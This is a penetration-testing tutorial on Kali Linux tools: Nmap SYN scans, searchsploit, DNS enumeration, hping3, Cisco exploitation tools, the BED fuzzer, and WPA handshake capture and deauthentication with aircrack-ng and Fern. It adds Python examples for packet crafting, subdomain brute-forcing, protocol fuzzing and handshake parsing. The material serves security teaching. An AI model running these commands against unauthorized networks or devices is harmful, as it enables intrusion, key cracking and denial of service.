A stealth scan, or SYN scan, is also known as a half-open scan because it never completes the TCP three-way handshake. The scanner sends a SYN packet to the target. If a SYN/ACK comes back, the port is listening (open); the scanner then answers with a RST instead of the ACK that would complete the connection, so the service never receives a connection and, on many hosts, nothing is logged at the application level. If the target answers with a RST, the port is closed. If nothing comes back (even after a retransmission), or an ICMP unreachable error arrives, NMAP reports the port as filtered. Because the SYN is crafted by hand rather than by the kernel’s connect() call, this scan type requires root privileges; an unprivileged user gets “You requested a scan type which requires root privileges”, and NMAP’s default scan becomes the full-connect scan (-sT) instead.

Now to see the SYN scan in practice, use the parameter “-sS” in NMAP. Following is the full command −

nmap -sS -T4 192.168.1.101

In ZenMAP, the same command can be typed into the “Command” field.
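To make the half-open exchange concrete, here is an added example (written for this page; it is not Nmap’s code) that builds the SYN segment a scanner sends, with a correct TCP checksum, classifies the reply the way a SYN scan does, and produces the RST that keeps the handshake from completing. Sending it requires a raw socket and root, so the sample run only constructs the packets; the IP addresses and ports are assumptions.

```python
import socket
import struct
from typing import Optional

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10  # TCP flag bits


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words, as used by IP, TCP and ICMP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    """IPv4 pseudo-header that the TCP checksum also covers."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                       0, socket.IPPROTO_TCP, tcp_len)


def build_tcp_segment(src_ip: str, dst_ip: str, sport: int, dport: int,
                      seq: int, flags: int, ack: int = 0, window: int = 1024) -> bytes:
    """A 20-byte TCP header (no options, no payload) with a valid checksum."""
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    csum = checksum(_pseudo_header(src_ip, dst_ip, len(header)) + header)
    return header[:16] + struct.pack("!H", csum) + header[18:]


def segment_is_valid(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """Re-running the checksum over a correctly summed segment yields zero."""
    return checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def tcp_flags(segment: bytes) -> int:
    return segment[13]


def classify_reply(reply_flags: Optional[int]) -> str:
    """What a half-open scanner concludes from the answer to its SYN.

    None stands for no answer at all (after a retransmission), which nmap
    reports as 'filtered': a firewall may be dropping the probe silently.
    """
    if reply_flags is None:
        return "filtered"
    if reply_flags & SYN and reply_flags & ACK:
        return "open"
    if reply_flags & RST:
        return "closed"
    return "unknown"


def scanner_followup(src_ip: str, dst_ip: str, probe: bytes, reply: bytes) -> Optional[bytes]:
    """Half-open behaviour: an open port's SYN/ACK is answered with a bare RST, not the ACK
    that would complete the handshake, so the target drops the embryonic connection and
    the listening service never sees an accepted connection."""
    sport, dport, seq, _ = struct.unpack("!HHII", probe[:12])
    if classify_reply(tcp_flags(reply)) != "open":
        return None
    return build_tcp_segment(src_ip, dst_ip, sport, dport, seq + 1, RST)


def send_segment(dst_ip: str, segment: bytes) -> None:
    """Send on a raw socket; needs root/CAP_NET_RAW, and the kernel adds the IP header. Not called here."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) as sock:
        sock.sendto(segment, (dst_ip, 0))


if __name__ == "__main__":
    scanner, target = "192.168.1.100", "192.168.1.101"   # assumed addresses
    probe = build_tcp_segment(scanner, target, 40000, 80, 1000, SYN)
    # Constructed reply from an open port: SYN/ACK acknowledging our sequence number + 1.
    reply = build_tcp_segment(target, scanner, 80, 40000, 7000, SYN | ACK, ack=1001)
    print("port 80:", classify_reply(tcp_flags(reply)))
    print("follow-up flags:", hex(tcp_flags(scanner_followup(scanner, target, probe, reply))))
```

The checksum over the pseudo-header is the part people get wrong when hand-crafting TCP: a segment with a bad checksum is silently discarded by the target, which looks exactly like a filtered port.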

Searchsploit

Searchsploit is a command-line front-end to a local copy of the Exploit Database (Exploit-DB) archive, so Kali users can search it without going online.

To open it, go to Applications → 08-Exploitation Tools → searchsploit, or simply open a terminal.

Then type “searchsploit” followed by the terms to look for, typically a product name and version, for example “searchsploit apache 2.2”. Results are listed with their title and the path of the exploit file below /usr/share/exploitdb; “searchsploit -x path” displays an entry, “searchsploit -m path” copies it into the current directory, and “searchsploit -u” updates the local database.

DNS Tools

In this section, we will learn how to use some of the DNS tools that Kali incorporates. They are used to enumerate a target domain: listing its records, attempting zone transfers, brute-forcing subdomains, and tracing where a resolver gets its answers from.

dnsenum.pl

The first tool is dnsenum.pl, a Perl script that collects a domain’s A, NS and MX records, attempts a zone transfer (AXFR) against each name server it finds, and can brute-force subdomains from a wordlist (-f). A successful zone transfer is a finding in itself: it hands over the whole zone.

Click the terminal on the left panel and type “dnsenum” followed by the domain, for example:

dnsenum example.com

The records are printed grouped by type (host addresses, name servers, mail servers), followed by the zone-transfer attempts.

DNSMAP

The second tool is DNSMAP, a subdomain brute-forcer: it tries a built-in (or user-supplied, -w) wordlist of names under the domain and reports the ones that resolve, along with their IP addresses. It does not look up phone numbers or contacts. Beware of wildcard DNS: if the zone has a catch-all record, every guessed name resolves to the same address and the results are meaningless until those entries are filtered out.

Click the terminal as in the section above, then type “dnsmap” followed by the domain, for example:

dnsmap example.com

dnstracer

The third tool is dnstracer, which follows the chain of name servers, starting from the root or from a given server, to determine where a DNS server ultimately gets its answer for a given hostname.

Click the terminal as in the section above, then type “dnstracer” followed by the hostname, for example:

dnstracer example.com
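As an added example (not part of the original tutorial, nor code from dnsenum or dnsmap), the script below does what dnsmap does with a wordlist and adds the wildcard check that separates real hosts from catch-all answers. The resolver is injectable so the sample run works offline against a constructed zone; the domain, addresses and wordlist are assumptions.

```python
import random
import socket
import string
from typing import Callable, Dict, List, Optional, Set

Resolver = Callable[[str], Optional[str]]  # hostname -> IPv4 address, or None for NXDOMAIN


def system_resolver(name: str) -> Optional[str]:
    """Real lookups through the OS resolver (needs network); not used by the sample run below."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def detect_wildcard(domain: str, resolve: Resolver, probes: int = 3) -> Set[str]:
    """Resolve random labels that cannot exist. Any answer means the zone has a
    catch-all (*.domain) record, and every guessed name would 'resolve' to it."""
    found = set()
    for _ in range(probes):
        label = "".join(random.choice(string.ascii_lowercase) for _ in range(20))
        ip = resolve(f"{label}.{domain}")
        if ip is not None:
            found.add(ip)
    return found


def brute_force_subdomains(domain: str, wordlist: List[str], resolve: Resolver) -> Dict[str, List[str]]:
    """dnsmap-style enumeration, with wildcard answers separated from real hosts."""
    wildcard_ips = detect_wildcard(domain, resolve)
    result: Dict[str, List[str]] = {"real": [], "wildcard": []}
    for word in wordlist:
        host = f"{word}.{domain}"
        ip = resolve(host)
        if ip is None:
            continue
        bucket = "wildcard" if ip in wildcard_ips else "real"
        result[bucket].append(f"{host} {ip}")
    return result


def fake_resolver(domain: str, zone: Dict[str, str], wildcard_ip: Optional[str]) -> Resolver:
    """Constructed stand-in for DNS: fixed records plus an optional catch-all for the domain."""
    def resolve(name: str) -> Optional[str]:
        if name in zone:
            return zone[name]
        if wildcard_ip is not None and name.endswith("." + domain):
            return wildcard_ip
        return None
    return resolve


# Constructed sample zone (documentation addresses from RFC 5737) and a short wordlist.
SAMPLE_ZONE = {
    "www.example.com": "203.0.113.10",
    "mail.example.com": "203.0.113.20",
    "vpn.example.com": "203.0.113.30",
}
SAMPLE_WORDLIST = ["www", "mail", "vpn", "ftp", "dev", "staging"]


if __name__ == "__main__":
    with_wildcard = fake_resolver("example.com", SAMPLE_ZONE, "203.0.113.9")
    for bucket, hits in brute_force_subdomains("example.com", SAMPLE_WORDLIST, with_wildcard).items():
        print(bucket, hits)
```

Against a real domain, pass system_resolver (or a resolver that queries the target’s own name servers, so that internal views are not hidden by your local cache) and a proper wordlist; the wildcard probe is what keeps a catch-all zone from reporting every word as a hit.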

LBD Tools

LBD (Load Balancing Detector) detects whether a given domain uses DNS and/or HTTP load balancing. This matters because when several servers sit behind one name, one of them may be patched while another is not, and each request may be answered by a different host; it also means that a finding from one request may not reproduce on the next. Following are the steps to use it −

First, click the terminal on the left panel.

Then, type “lbd” followed by the domain name, for example:

lbd example.com

LBD checks the DNS answers (several A records for the name) and the HTTP responses (differing “Server” or “Date” headers and differing bodies across repeated requests). A result of “FOUND” means load balancing was detected; in the case shown in the original screenshot, the result was “NOT FOUND”.

Hping3

Hping3 is widely used by ethical hackers. It is similar to ping but far more flexible: it can craft packets with the TCP, UDP, ICMP and raw-IP protocols, set any flags, ports and TTLs, and so probe how a firewall filters traffic (for example, whether a SYN to port 80 gets through when ICMP echo is blocked). It has a traceroute mode and can carry a file over a covert channel between two hosts.

Click the terminal on the left panel.

Type “hping3 -h”, which will show how to use this command.

The general form is “hping3 <options> <host or IP>”. For example, three TCP SYN probes to port 80, where the reply flags show whether the port is open (SA, i.e. SYN/ACK) or closed (RA, i.e. RST/ACK) −

hping3 -S -p 80 -c 3 192.168.1.101

and a traceroute carried in SYN packets rather than ICMP, which often passes filters that drop ICMP −

hping3 --traceroute -V -S -p 80 192.168.1.101

Note that crafting packets needs root privileges, and that anything beyond a handful of probes looks like a scan or a flood to the target’s monitoring.

In this chapter, we will learn how to use some of the tools that help us exploit devices or applications in order to gain access.

Cisco Tools

Kali has some tools that can be used to test Cisco routers. One such tool is Cisco-torch, which is used for mass scanning, fingerprinting, and exploitation of Cisco devices; it probes for the Telnet, SSH, web, NTP, SNMP and TFTP services that are typical of Cisco equipment.

Let’s open the Terminal console by clicking the left pane.

Then, type “cisco-torch” with the desired scan options followed by the IP of the host. If nothing exploitable is found, the tool simply reports the hosts and services it checked, without any hit.

To see what parameters can be used, type “cisco-torch ?” (or run it with no arguments); the usage text is printed.

Cisco Auditing Tool

It is a Perl script which scans Cisco routers for common vulnerabilities, including default and weak Telnet passwords and SNMP community strings. To use it, open the terminal on the left pane as shown in the previous section and type “CAT -h” followed by the hostname or IP.

You can add the port parameter “-p”, which in the original screenshot is 23 (Telnet), to brute-force the login on that port with the tool’s password list.

Cisco Global Exploiter

Cisco Global Exploiter (CGE) is an advanced, simple, and fast security testing tool. It bundles a numbered list of known Cisco vulnerabilities, which the tool prints when run without arguments. However, be careful while testing in a live environment, as several of them are denial-of-service conditions that can crash or hang the Cisco device and stop the services it provides.

To use this tool, type “cge.pl” followed by the target IP address and the number of the vulnerability to test.

The result of the test performed on a Cisco router for vulnerability number 3 from that list showed that the vulnerability was successfully exploited.

BED

BED (Bruteforce Exploit Detector) is a program designed to check daemons for potential buffer overflows, format string bugs and similar input-handling faults. It sends a long series of malformed protocol messages (over-long strings, format specifiers, out-of-range numbers) through a plugin for the chosen protocol and watches whether the daemon keeps answering; a daemon that stops responding after a particular test case is the result you are looking for.

In this case, we will test the testing machine with IP 192.168.1.102 and the protocol HTTP.

The command is “bed -s HTTP -t 192.168.1.102”, and the testing runs until every case has been sent. The target port can be changed with “-p” and the per-request timeout with “-o”. Do not run this against a production daemon: the whole point of the tool is to crash it.
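What a protocol fuzzer like BED does can be shown in a few lines. The following is an added example (written for this page, not BED’s code or payload lists): it generates over-long, format-string and boundary-value HTTP requests, sends them one by one, and treats a connection failure followed by a failed benign request as the crash signal. The sample run uses a constructed stand-in daemon that dies on a request line longer than 2048 bytes; the host and that threshold are assumptions.

```python
import socket
from typing import Callable, Iterable, Iterator, List, Tuple

# Payload classes of the kind a protocol fuzzer sends; these lists are the example's own, not BED's.
OVERFLOW_LENGTHS = (256, 1024, 4096, 16384)
FORMAT_STRINGS = ("%s%s%s%s", "%n%n%n%n", "%x" * 32)
INTEGER_EDGES = ("-1", "0", "2147483647", "4294967295")

Sender = Callable[[bytes], bytes]  # sends one request and returns the reply; raises OSError on connection failure


def http_test_cases(host: str) -> Iterator[Tuple[str, bytes]]:
    """(label, raw request) pairs that put each payload in a different part of an HTTP/1.0 request."""
    for n in OVERFLOW_LENGTHS:
        yield f"path-{n}", f"GET /{'A' * n} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
        yield f"header-{n}", f"GET / HTTP/1.0\r\nHost: {host}\r\nUser-Agent: {'A' * n}\r\n\r\n".encode()
    for fs in FORMAT_STRINGS:
        yield f"fmt-{fs[:4]}", f"GET /{fs} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    for v in INTEGER_EDGES:
        yield f"clen-{v}", f"POST / HTTP/1.0\r\nHost: {host}\r\nContent-Length: {v}\r\n\r\n".encode()


def tcp_sender(host: str, port: int, timeout: float = 3.0) -> Sender:
    """One fresh TCP connection per request against a real daemon (not used by the sample run)."""
    def send(payload: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(payload)
            return sock.recv(4096)
    return send


def fuzz(send: Sender, cases: Iterable[Tuple[str, bytes]]) -> List[Tuple[str, str]]:
    """Send each case and record the failures.

    A connection error right after a case is the crash signal a fuzzer reports. A
    benign probe is then sent: if that fails too, the daemon is down and fuzzing
    stops, so the case that did it is not buried under a wall of 'refused' errors.
    """
    findings: List[Tuple[str, str]] = []
    for label, payload in cases:
        try:
            send(payload)
        except OSError as exc:
            findings.append((label, type(exc).__name__))
            try:
                send(b"GET / HTTP/1.0\r\n\r\n")
            except OSError:
                findings.append((label, "daemon-down"))
                break
    return findings


def fake_daemon(max_request_line: int = 2048) -> Sender:
    """Constructed stand-in for the target: dies (refuses all later connections) on an over-long request line."""
    state = {"alive": True}

    def send(payload: bytes) -> bytes:
        if not state["alive"]:
            raise ConnectionRefusedError("connection refused")
        request_line = payload.split(b"\r\n", 1)[0]
        if len(request_line) > max_request_line:
            state["alive"] = False
            raise ConnectionResetError("connection reset by peer")
        return b"HTTP/1.0 200 OK\r\n\r\n"
    return send


if __name__ == "__main__":
    for finding in fuzz(fake_daemon(), http_test_cases("192.168.1.102")):
        print(finding)
```

Against the real target, replace fake_daemon() with tcp_sender("192.168.1.102", 80); the label of the first failing case tells you which input class to reproduce by hand under a debugger.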

Wi-Fi Cracking with aircrack-ng

In this chapter, we will learn how to use the Wi-Fi cracking tools that Kali Linux has incorporated. However, it is important that the wireless card you use supports monitor mode (and packet injection, for the deauthentication step below).

Step 1 – Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:

 airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won’t work with v0.9.1. Both entries of the Atheros card show “madwifi-ng” as the driver – follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver – see the generic instructions for setting it up.

Step 1a – Setting up madwifi-ng

First stop ath0 by entering:

 airmon-ng stop ath0   

The system responds:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.

The system will respond:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that “ath0” is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter “iwconfig”.

The system will respond:

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.

Step 1b – Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:

 airmon-ng start wlan0 9

The system responds:

 Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run “iwconfig”. The following output should appear:

 lo        no wireless extensions.
 eth0      no wireless extensions.
 
 wmaster0  no wireless extensions.
 
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode – this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel – changing the channel on one interface also changes channel on the other one.

Step 1c – Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):

 airmon-ng start rausb0 9

The system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)

At this point, the interface should be ready to use.

Step 2 – Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

  • -c 9 is the channel for the wireless network
  • --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
  • -w psk is the file name prefix for the capture file (psk-01.cap and so on) in which the full packets, including the handshake, are saved.
  • ath0 is the interface name.

Important: Do NOT use the “--ivs” option. It keeps only the initialization vectors used for WEP cracking, and a WPA handshake cannot be recovered from an IVs-only file. You must capture the full packets.

Here is what it looks like if a wireless client is connected to the network:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             

Checking for the handshake

There are two ways to see whether the capture contains the handshake. Watch the airodump-ng screen for “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner; this means a four-way handshake was successfully captured (see the example screen above).

Or open the capture file in Wireshark and apply the display filter “eapol”. This shows only the EAPOL frames, so you can see whether the capture contains 0, 1, 2, 3 or 4 of the handshake messages. Not all four are needed to crack the key, but a capture that holds only message 1 (the one the AP sends before the client answers) is useless.
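The Wireshark check can be automated. The following is an added example (not code from the aircrack-ng project): it reads a libpcap file as written by airodump-ng, strips the radiotap header, finds the EAPOL-Key frames and tells the four handshake messages apart by the Key ACK, Key MIC and Secure bits of the Key Information field. The capture used in the sample run is constructed in the script from synthetic frames, using the BSSID and client MAC from this chapter; the usability rule (message 2 plus message 1 or 3) is the commonly stated one for aircrack-ng and is applied here as an assumption.

```python
import struct
from typing import List, Sequence

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header carrying EtherType 0x888E (EAPOL)
KEY_ACK, KEY_MIC, KEY_SECURE = 0x0080, 0x0100, 0x0200   # bits of the EAPOL-Key "Key Information" field
LINKTYPE_IEEE802_11, LINKTYPE_RADIOTAP = 105, 127
AP_MAC = bytes.fromhex("00146c7e4080")    # the BSSID used in this chapter
STA_MAC = bytes.fromhex("000fb5fdfbc2")   # the client shown in the airodump-ng screen


def pcap_packets(data: bytes):
    """Yield (linktype, packet) from a classic libpcap file. pcapng is not handled."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a libpcap capture")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def eapol_key_message(wlan: bytes):
    """Return 1..4 if this 802.11 frame is a 4-way handshake message, else None."""
    if len(wlan) < 24:
        return None
    fc, flags = wlan[0], wlan[1]
    if ((fc >> 2) & 0x3) != 2:        # only data frames (type 2) carry EAPOL
        return None
    subtype = fc >> 4
    if subtype & 0x4:                 # "null" data subtypes have no body
        return None
    if flags & 0x40:                  # Protected Frame bit: encrypted payload, not plaintext EAPOL
        return None
    hdr = 24 + (6 if (flags & 0x3) == 0x3 else 0) + (2 if subtype & 0x8 else 0)  # +Addr4, +QoS Control
    body = wlan[hdr:]
    if not body.startswith(LLC_SNAP_EAPOL) or len(body) < 8 + 7:
        return None
    eapol = body[8:]
    if eapol[1] != 3:                 # EAPOL packet type 3 = EAPOL-Key
        return None
    key_info = struct.unpack("!H", eapol[5:7])[0]   # after version, type, length, descriptor type
    ack, mic, secure = bool(key_info & KEY_ACK), bool(key_info & KEY_MIC), bool(key_info & KEY_SECURE)
    if ack and not mic:
        return 1                      # AP -> STA: ANonce
    if mic and not ack and not secure:
        return 2                      # STA -> AP: SNonce + MIC (what the cracker tests passphrases against)
    if ack and mic:
        return 3                      # AP -> STA: ANonce again, GTK, MIC
    if mic and not ack and secure:
        return 4                      # STA -> AP: confirmation
    return None


def handshake_messages(pcap: bytes) -> List[int]:
    """Distinct handshake message numbers present in the capture."""
    seen = set()
    for linktype, pkt in pcap_packets(pcap):
        if linktype == LINKTYPE_RADIOTAP:
            pkt = pkt[struct.unpack("<H", pkt[2:4])[0]:]   # radiotap length, little-endian at offset 2
        elif linktype != LINKTYPE_IEEE802_11:
            continue
        msg = eapol_key_message(pkt)
        if msg:
            seen.add(msg)
    return sorted(seen)


def handshake_usable(messages: Sequence[int]) -> bool:
    """Rule applied here: message 2 plus a message carrying the ANonce (1 or 3)."""
    return 2 in messages and (1 in messages or 3 in messages)


# --- constructed sample capture (synthetic frames; nonces, MICs and other key fields are zeroed) ---

def eapol_key_frame(from_ap: bool, key_info: int, qos: bool = False) -> bytes:
    fc = 0x88 if qos else 0x08                       # data / QoS data
    flags = 0x02 if from_ap else 0x01                # FromDS / ToDS
    a1, a2, a3 = (STA_MAC, AP_MAC, AP_MAC) if from_ap else (AP_MAC, STA_MAC, AP_MAC)
    header = bytes([fc, flags]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + (b"\x00\x00" if qos else b"")
    key_body = b"\x02" + struct.pack("!H", key_info) + b"\x00" * 88   # descriptor type 2 (RSN), key info, rest zeroed
    eapol = b"\x02\x03" + struct.pack("!H", len(key_body)) + key_body   # version 2, type 3 (EAPOL-Key), length
    radiotap = b"\x00\x00" + struct.pack("<H", 8) + b"\x00\x00\x00\x00"  # minimal 8-byte radiotap header
    return radiotap + header + LLC_SNAP_EAPOL + eapol


def beacon_frame() -> bytes:
    radiotap = b"\x00\x00" + struct.pack("<H", 8) + b"\x00\x00\x00\x00"
    return radiotap + b"\x80\x00\x00\x00" + b"\xff" * 6 + AP_MAC + AP_MAC + b"\x00\x00" + b"\x00" * 12


def build_pcap(frames: Sequence[bytes]) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_RADIOTAP)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1174755480 + i, 0, len(frame), len(frame)) + frame
    return out


M1, M2, M3, M4 = 0x008A, 0x010A, 0x13CA, 0x030A   # typical Key Information values for messages 1-4
FULL_CAPTURE = build_pcap([beacon_frame(), eapol_key_frame(True, M1), eapol_key_frame(False, M2),
                           eapol_key_frame(True, M3, qos=True), eapol_key_frame(False, M4)])
M1_ONLY_CAPTURE = build_pcap([beacon_frame(), eapol_key_frame(True, M1)])

if __name__ == "__main__":
    for name, cap in (("full", FULL_CAPTURE), ("m1-only", M1_ONLY_CAPTURE)):
        msgs = handshake_messages(cap)
        print(name, msgs, "usable" if handshake_usable(msgs) else "NOT usable")
```

To check a real file, call handshake_messages(open("psk-01.cap", "rb").read()); a result of [1] means the deauthentication worked but the client’s reply was missed (wrong channel, or the card was hopping), which is the most common reason aircrack-ng later reports no valid handshake.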

Step 3 – Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name

Here is what the output looks like:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.

Fern Wifi Cracker

Fern Wifi Cracker is a GUI tool in Kali for attacking wireless networks (WEP key recovery and WPA/WPA2 dictionary attacks).

Before opening Fern, we should put the wireless card into monitor mode. To do this, type “airmon-ng start wlan0” in the terminal (replace wlan0 with your interface name; airmon-ng prints the name of the monitor interface it created).

Now, open Fern Wifi Cracker.

Step 1 − Applications → Click “Wireless Attacks” → “Fern Wifi Cracker”.

Step 2 − Select the wireless (monitor-mode) interface from the drop-down list.

Step 3 − Click “Scan for Access Points”.

Step 4 − After the scan finishes, the networks found are counted under the WEP and WPA buttons. In this case, only WPA networks were found.

Step 5 − Click the WPA button; all the WPA networks found are listed. Against WPA/WPA2 networks, Fern performs a dictionary attack: it captures the handshake (deauthenticating a client to force one, if needed) and tries each word in the list against it, so the key is recovered only if the passphrase is in the wordlist.

Step 6 − Click “Browse” and select the wordlist to use for the attack.

Step 7 − Click “Wifi Attack”.

Step 8 − When the dictionary attack finishes, the recovered key is displayed in the window.

Kismet

Kismet is a Wi-Fi network analysing tool. It is an 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It will work with any wireless card that supports raw monitoring (rfmon) mode and can sniff 802.11a/b/g/n traffic. It identifies networks passively by collecting packets, which also reveals hidden (non-broadcast SSID) networks once a client associates with them.

To use it, turn the wireless card into monitor mode by typing “airmon-ng start wlan0” in the terminal.

Let’s learn how to use this tool.

